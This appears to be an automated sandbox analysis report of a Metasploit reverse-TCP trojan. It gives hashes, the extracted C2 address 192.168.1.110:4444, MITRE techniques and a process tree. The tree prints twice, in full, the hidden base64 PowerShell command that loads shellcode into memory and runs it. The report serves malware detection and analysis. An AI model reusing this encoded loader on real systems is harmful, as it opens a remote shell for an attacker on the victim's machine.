metasploit | 6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39

General

Target

6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39N.exe
Size

17KB
MD5

37b3c02b102fd694f736477b9862fdd0
SHA1

48ff7d04054dc85c29a103b53bbe60cb04f48418
SHA256

6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39
SHA512

498d8c5ed42ac24aeeffef94081098eccb1245e14a1b3e22414fa867fad89457906c45e0cc63c3f4a34c18817f156fa2703a4ed456c05182f6932fa3b1f2bb14
SSDEEP

384:HEEoLO56ayzcMj+/4y8qYj1jewPbcY5+INel1nfTJYQ:kE8O56lcV/4yrwPbcU+INenfTSQ

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

192.168.1.110:4444

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4740	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4740	powershell.exe
4740	powershell.exe
4056	powershell.exe
4056	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeDebugPrivilege	4056	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 4768 wrote to memory of 2472	4768	6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39N.exe	84
PID 4768 wrote to memory of 2472	4768	6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39N.exe	84
PID 2472 wrote to memory of 4740	2472	cmd.exe	85
PID 2472 wrote to memory of 4740	2472	cmd.exe	85
PID 4740 wrote to memory of 4056	4740	powershell.exe	86
PID 4740 wrote to memory of 4056	4740	powershell.exe	86
PID 4740 wrote to memory of 4056	4740	powershell.exe	86
PID 4056 wrote to memory of 3956	4056	powershell.exe	87
PID 4056 wrote to memory of 3956	4056	powershell.exe	87
PID 4056 wrote to memory of 3956	4056	powershell.exe	87
PID 3956 wrote to memory of 3896	3956	csc.exe	88
PID 3956 wrote to memory of 3896	3956	csc.exe	88
PID 3956 wrote to memory of 3896	3956	csc.exe	88

C:\Users\Admin\AppData\Local\Temp\6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39N.exe
"C:\Users\Admin\AppData\Local\Temp\6d58d411c57b139a09a7ba8909529d5c5caf8d678066ffef0d19b889529e4b39N.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -window hidden -EncodedCommand JAAwADAAOAAgAD0AIAAnACQAOABBADIAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAA4AEEAMgBCACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAOAAsADAAeAAyADUALAAwAHgANABhACwAMAB4ADgAYgAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGMAYwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwBiACwAMAB4AGIANgAsADAAeAA2ADkALAAwAHgAMQA1ACwAMAB4AGUAZgAsADAAeABhAGYALAAwAHgAZQAxACwAMAB4AGQANgAsADAAeAAwAGYALAAwAHgAMwAwACwAMAB4ADkAZQAsADAAeABlADcALAAwAHgAZABkACwAMAB4AGIAOQAsADAAeABiAGIALAAwAHgANgBjACwAMAB4ADYAYQAsADAAeABlAGIALAAwAHgANwAzACwAMAB4AGUANgAsADAAeAAzAGUALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABhAGEALAAwAHgAYQBhACwAMAB4ADEANwAsADAAeAA0ADgALAAwAHgAMAAwACwAMAB4AGYANAAsADAAeABhAGMALAAwAHgAYwA0ACwAMAB4AGIAZAAsADAAeABjADkALAAwAHgANABkACwAMAB4ADEAOQAsADAAeAA3AGUALAAwAHgAOAA1ACwAMAB4ADgAZQAsADAAeAAzAGIALAAwAHgAMAAyACwAMAB4AGQANwAsADAAeABjADIALAAwAHgAOQBiACwAMAB4ADMAYgAsADAAeAAxADgALAAwAHgAMQA3ACwAMAB4AGQAZAAsADAAeAA3AGMALAAwAHgAZQBmACwAMAB4ADUAZAAsADAAeAAzADIALAAwAHgAZAAwACwAMAB4AGIAOAAsADAAeAAxADYALAAwAHgAOQBlACwAMAB4AGMANQAsADAAeABjAGQALAAwAHgANgBiACwAMAB4ADIAMwAsADAAeABlADcALAAwAHgAMAAxACwAMAB4AGUAMAAsADAAeAAxAGIALAAwAHgAOQBmACwAMAB4ADIANAAsADAAeAAzADcALAAwAHgAZQBmACwAMAB4ADEAMwAsADAAeAAyADcALAAwAHgANgA4ACwAMAB4ADkAYgAsADAAeABmADQALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeAAxADcALAAwAHgANABjACwAMAB4ADUAZgAsADAAeABkADkALAAwAHgAZgA0ACwAMAB4AGMAOAAsADAAeAA5ADYALAAwAHgAYQBkACwAMAB4AGMANgAsADAAeABlADMALAAwAHgAZAA3ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAMwAwACwAMAB4AGEAYwAsADAAeAA5ADkALAAwAHgAMQA0ACwAMAB4ADAAOQAsADAAeAA3ADIALAAwAHgAMwA1ACwAMAB4ADUAOQAsADAAeABhADUALAAwAHgANwBmACwAMAB4ADQANwAsADAAeAA5AGQALAAwAHgAMAAyACwAMAB4ADkAZgAsADAAeAAzADIALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAAyADIALAAwAHgANAA1ACwAMAB4ADIAZQAsADAAeAAwAGEALAAwAHgAZgA4ACwAMAB4AGMAMAAsADAAeABiADEALAAwAHgAYQBjACwAMAB4ADgAYgAsADAAeAA3ADMALAAwAHgAMQA2ACwAMAB4ADQAYwAsADAAeAA1ADgALAAwAHgAZQA1ACwAMAB4AGQAZAAsADAAeAA0ADIALAAwAHgAMQA1ACwAMAB4ADYAMQAsADAAeABiADkALAAwAHgANAA2ACwAMAB4AGEAOAAsADAAeABhADYALAAwAHgAYgAxACwAMAB4ADcAMwAsADAAeAAyADEALAAwAHgANAA5ACwAMAB4ADEANgAsADAAeABmADIALAAwAHgANwAxACwAMAB4ADYAZQAsADAAeABiADIALAAwAHgANQBlACwAMAB4ADIAMgAsADAAeAAwAGYALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA4ADUALAAwAHgAMwAwACwAMAB4AGYAMwAsADAAeABlADMALAAwAHgANwBhACwAMAB4ADkANQAsADAAeAA3AGYALAAwAHgAMAAxACwAMAB4ADYAZAAsADAAeABhADkALAAwAHgANwBmACwAMAB4AGQAOQAsADAAeAA5ADIALAAwAHgAZgA3ACwAMAB4ADEANwAsADAAeAAxADUALAAwAHgANQBlACwAMAB4ADAAOAAsADAAeABlADgALAAwAHgAMwAxACwAMAB4AGUAOQAsADAAeAA3AGIALAAwAHgAZABhACwAMAB4ADkAZQAsADAAeAA0ADEALAAwAHgAMQA0ACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgANABmACwAMAB4AGUAMwAsADAAeABlAGYALAAwAHgANwAwACwAMAB4ADcAMAAsADAAeAAzAGIALAAwAHgANQA3ACwAMAB4ADEAMAAsADAAeAA4AGYALAAwAHgAYgBjACwAMAB4AGEAOAAsADAAeAAzADgALAAwAHgANABiACwAMAB4AGUAOAAsADAAeABmADgALAAwAHgANQAyACwAMAB4ADcAYQAsADAAeAA5ADEALAAwAHgAOQAyACwAMAB4AGEAMgAsADAAeAA4ADMALAAwAHgANAA0ACwAMAB4ADAAZQAsADAAeABhADkALAAwAHgAMQAzACwAMAB4AGEANwAsADAAeAA2ADcALAAwAHgAYQBjACwAMAB4ADgAZAAsADAAeAA0AGYALAAwAHgANwBhACwAMAB4AGEAZgAsADAAeAA0ADAALAAwAHgAYwBjACwAMAB4AGYAMwAsADAAeAA0ADkALAAwAHgAMwAyACwAMAB4AGIAYwAsADAAeAA1ADMALAAwAHgAYwA2ACwAMAB4AGYAMgAsADAAeAA2AGMALAAwAHgAMQA0ACwAMAB4AGIANgAsADAAeAA5AGEALAAwAHgANgA2ACwAMAB4ADkAYgAsADAAeABlADkALAAwAHgAYgBhACwAMAB4ADgAOAAsADAAeAA3ADEALAAwAHgAOAAyACwAMAB4ADUAMAAsADAAeAA2ADcALAAwAHgAMgBjACwAMAB4AGYAYQAsADAAeABjAGMALAAwAHgAMQBlACwAMAB4ADcANQAsADAAeAA3ADAALAAwAHgANgBkACwAMAB4AGQAZQAsADAAeABhADMALAAwAHgAZgBjACwAMAB4AGEAZAAsADAAeAA1ADQALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA2ADMALAAwAHgAOQBkACwAMAB4ADIAZAAsADAAeAAxADIALAAwAHgAMQAzACwAMAB4ADYAZAAsADAAeAA3ADgALAAwAHgANAA4ACwAMAB4AGIANQAsADAAeAA3ADIALAAwAHgANQA2ACwAMAB4AGUANwAsADAAeAAzADkALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABhAGUALAAwAHgANgBlACwAMAB4ADkAZgAsADAAeAA1AGYALAAwAHgAOQA3ACwAMAB4ADUAOAAsADAAeAAwADAALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAOAA5ACwAMAB4ADMANQAsADAAeABiAGQALAAwAHgAOABiACwAMAB4AGYANQAsADAAeABkADkALAAwAHgAMwBkACwAMAB4ADQAYgAsADAAeABhADAALAAwAHgAYgAzACwAMAB4ADMAZAAsADAAeAAyADMALAAwAHgAMQA0ACwAMAB4AGUAMAAsADAAeAA2AGQALAAwAHgANQA2ACwAMAB4ADUAYgAsADAAeAAzAGQALAAwAHgAMAAyACwAMAB4AGMAYgAsADAAeABjAGUALAAwAHgAYgBlACwAMAB4ADcAMwAsADAAeABiADgALAAwAHgANQA5ACwAMAB4AGQANwAsADAAeAA3ADkALAAwAHgAZQA3ACwAMAB4AGEAZQAsADAAeAA3ADgALAAwAHgAOAAxACwAMAB4AGMAMgAsADAAeAAyAGUALAAwAHgANAA0ACwAMAB4ADUANAAsADAAeAAyAGEALAAwAHgANAA1ACwAMAB4AGEANAAsADAAeAA2ADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGgAWgBpAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABoAFoAaQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAaABaAGkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAAwADAAOAApACkAOwAkADUAZwA5ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAYgBtAFcAagAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABiAG0AVwBqACAAJAA1AGcAOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA1AGcAOQAgACQAZQAiADsAfQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -window hidden -EncodedCommand JAAwADAAOAAgAD0AIAAnACQAOABBADIAQgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnACcAOwAkAHcAIAA9ACAAQQBkAGQALQBUAHkAcABlACAALQBtAGUAbQBiAGUAcgBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJAA4AEEAMgBCACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGIAOAAsADAAeAAyADUALAAwAHgANABhACwAMAB4ADgAYgAsADAAeABlADAALAAwAHgAZABiACwAMAB4AGMAYwAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBlACwAMAB4ADIAOQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADQAYgAsADAAeAAzADEALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAAwADMALAAwAHgANAA2ACwAMAB4ADEAMgAsADAAeAA4ADMALAAwAHgAYwBiACwAMAB4AGIANgAsADAAeAA2ADkALAAwAHgAMQA1ACwAMAB4AGUAZgAsADAAeABhAGYALAAwAHgAZQAxACwAMAB4AGQANgAsADAAeAAwAGYALAAwAHgAMwAwACwAMAB4ADkAZQAsADAAeABlADcALAAwAHgAZABkACwAMAB4AGIAOQAsADAAeABiAGIALAAwAHgANgBjACwAMAB4ADYAYQAsADAAeABlAGIALAAwAHgANwAzACwAMAB4AGUANgAsADAAeAAzAGUALAAwAHgAMAAwACwAMAB4AGYAZgAsADAAeABhAGEALAAwAHgAYQBhACwAMAB4ADEANwAsADAAeAA0ADgALAAwAHgAMAAwACwAMAB4AGYANAAsADAAeABhAGMALAAwAHgAYwA0ACwAMAB4AGIAZAAsADAAeABjADkALAAwAHgANABkACwAMAB4ADEAOQAsADAAeAA3AGUALAAwAHgAOAA1ACwAMAB4ADgAZQAsADAAeAAzAGIALAAwAHgAMAAyACwAMAB4AGQANwAsADAAeABjADIALAAwAHgAOQBiACwAMAB4ADMAYgAsADAAeAAxADgALAAwAHgAMQA3ACwAMAB4AGQAZAAsADAAeAA3AGMALAAwAHgAZQBmACwAMAB4ADUAZAAsADAAeAAzADIALAAwAHgAZAAwACwAMAB4AGIAOAAsADAAeAAxADYALAAwAHgAOQBlACwAMAB4AGMANQAsADAAeABjAGQALAAwAHgANgBiACwAMAB4ADIAMwAsADAAeABlADcALAAwAHgAMAAxACwAMAB4AGUAMAAsADAAeAAxAGIALAAwAHgAOQBmACwAMAB4ADIANAAsADAAeAAzADcALAAwAHgAZQBmACwAMAB4ADEAMwAsADAAeAAyADcALAAwAHgANgA4ACwAMAB4ADkAYgAsADAAeABmADQALAAwAHgAMAA3ACwAMAB4AGQAOAAsADAAeAAxADcALAAwAHgANABjACwAMAB4ADUAZgAsADAAeABkADkALAAwAHgAZgA0ACwAMAB4AGMAOAAsADAAeAA5ADYALAAwAHgAYQBkACwAMAB4AGMANgAsADAAeABlADMALAAwAHgAZAA3ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAMwAwACwAMAB4AGEAYwAsADAAeAA5ADkALAAwAHgAMQA0ACwAMAB4ADAAOQAsADAAeAA3ADIALAAwAHgAMwA1ACwAMAB4ADUAOQAsADAAeABhADUALAAwAHgANwBmACwAMAB4ADQANwAsADAAeAA5AGQALAAwAHgAMAAyACwAMAB4ADkAZgAsADAAeAAzADIALAAwAHgAZAA1ACwAMAB4ADcAMAAsADAAeAAyADIALAAwAHgANAA1ACwAMAB4ADIAZQAsADAAeAAwAGEALAAwAHgAZgA4ACwAMAB4AGMAMAAsADAAeABiADEALAAwAHgAYQBjACwAMAB4ADgAYgAsADAAeAA3ADMALAAwAHgAMQA2ACwAMAB4ADQAYwAsADAAeAA1ADgALAAwAHgAZQA1ACwAMAB4AGQAZAAsADAAeAA0ADIALAAwAHgAMQA1ACwAMAB4ADYAMQAsADAAeABiADkALAAwAHgANAA2ACwAMAB4AGEAOAAsADAAeABhADYALAAwAHgAYgAxACwAMAB4ADcAMwAsADAAeAAyADEALAAwAHgANAA5ACwAMAB4ADEANgAsADAAeABmADIALAAwAHgANwAxACwAMAB4ADYAZQAsADAAeABiADIALAAwAHgANQBlACwAMAB4ADIAMgAsADAAeAAwAGYALAAwAHgAZQAzACwAMAB4ADMAYQAsADAAeAA4ADUALAAwAHgAMwAwACwAMAB4AGYAMwAsADAAeABlADMALAAwAHgANwBhACwAMAB4ADkANQAsADAAeAA3AGYALAAwAHgAMAAxACwAMAB4ADYAZAAsADAAeABhADkALAAwAHgANwBmACwAMAB4AGQAOQAsADAAeAA5ADIALAAwAHgAZgA3ACwAMAB4ADEANwAsADAAeAAxADUALAAwAHgANQBlACwAMAB4ADAAOAAsADAAeABlADgALAAwAHgAMwAxACwAMAB4AGUAOQAsADAAeAA3AGIALAAwAHgAZABhACwAMAB4ADkAZQAsADAAeAA0ADEALAAwAHgAMQA0ACwAMAB4ADUANgAsADAAeAA1ADYALAAwAHgANABmACwAMAB4AGUAMwAsADAAeABlAGYALAAwAHgANwAwACwAMAB4ADcAMAAsADAAeAAzAGIALAAwAHgANQA3ACwAMAB4ADEAMAAsADAAeAA4AGYALAAwAHgAYgBjACwAMAB4AGEAOAAsADAAeAAzADgALAAwAHgANABiACwAMAB4AGUAOAAsADAAeABmADgALAAwAHgANQAyACwAMAB4ADcAYQAsADAAeAA5ADEALAAwAHgAOQAyACwAMAB4AGEAMgAsADAAeAA4ADMALAAwAHgANAA0ACwAMAB4ADAAZQAsADAAeABhADkALAAwAHgAMQAzACwAMAB4AGEANwAsADAAeAA2ADcALAAwAHgAYQBjACwAMAB4ADgAZAAsADAAeAA0AGYALAAwAHgANwBhACwAMAB4AGEAZgAsADAAeAA0ADAALAAwAHgAYwBjACwAMAB4AGYAMwAsADAAeAA0ADkALAAwAHgAMwAyACwAMAB4AGIAYwAsADAAeAA1ADMALAAwAHgAYwA2ACwAMAB4AGYAMgAsADAAeAA2AGMALAAwAHgAMQA0ACwAMAB4AGIANgAsADAAeAA5AGEALAAwAHgANgA2ACwAMAB4ADkAYgAsADAAeABlADkALAAwAHgAYgBhACwAMAB4ADgAOAAsADAAeAA3ADEALAAwAHgAOAAyACwAMAB4ADUAMAAsADAAeAA2ADcALAAwAHgAMgBjACwAMAB4AGYAYQAsADAAeABjAGMALAAwAHgAMQBlACwAMAB4ADcANQAsADAAeAA3ADAALAAwAHgANgBkACwAMAB4AGQAZQAsADAAeABhADMALAAwAHgAZgBjACwAMAB4AGEAZAAsADAAeAA1ADQALAAwAHgANAAwACwAMAB4ADAAMAAsADAAeAA2ADMALAAwAHgAOQBkACwAMAB4ADIAZAAsADAAeAAxADIALAAwAHgAMQAzACwAMAB4ADYAZAAsADAAeAA3ADgALAAwAHgANAA4ACwAMAB4AGIANQAsADAAeAA3ADIALAAwAHgANQA2ACwAMAB4AGUANwAsADAAeAAzADkALAAwAHgAZQA3ACwAMAB4ADUAZAAsADAAeABhAGUALAAwAHgANgBlACwAMAB4ADkAZgAsADAAeAA1AGYALAAwAHgAOQA3ACwAMAB4ADUAOAAsADAAeAAwADAALAAwAHgAOQBmACwAMAB4AGYAMgAsADAAeABkADMALAAwAHgAOAA5ACwAMAB4ADMANQAsADAAeABiAGQALAAwAHgAOABiACwAMAB4AGYANQAsADAAeABkADkALAAwAHgAMwBkACwAMAB4ADQAYgAsADAAeABhADAALAAwAHgAYgAzACwAMAB4ADMAZAAsADAAeAAyADMALAAwAHgAMQA0ACwAMAB4AGUAMAAsADAAeAA2AGQALAAwAHgANQA2ACwAMAB4ADUAYgAsADAAeAAzAGQALAAwAHgAMAAyACwAMAB4AGMAYgAsADAAeABjAGUALAAwAHgAYgBlACwAMAB4ADcAMwAsADAAeABiADgALAAwAHgANQA5ACwAMAB4AGQANwAsADAAeAA3ADkALAAwAHgAZQA3ACwAMAB4AGEAZQAsADAAeAA3ADgALAAwAHgAOAAxACwAMAB4AGMAMgAsADAAeAAyAGUALAAwAHgANAA0ACwAMAB4ADUANAAsADAAeAAyAGEALAAwAHgANAA1ACwAMAB4AGEANAAsADAAeAA2ADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAGgAWgBpAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJABoAFoAaQAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAaABaAGkALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAAwADAAOAApACkAOwAkADUAZwA5ACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAYgBtAFcAagAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABiAG0AVwBqACAAJAA1AGcAOQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAA1AGcAOQAgACQAZQAiADsAfQA=
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4740
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
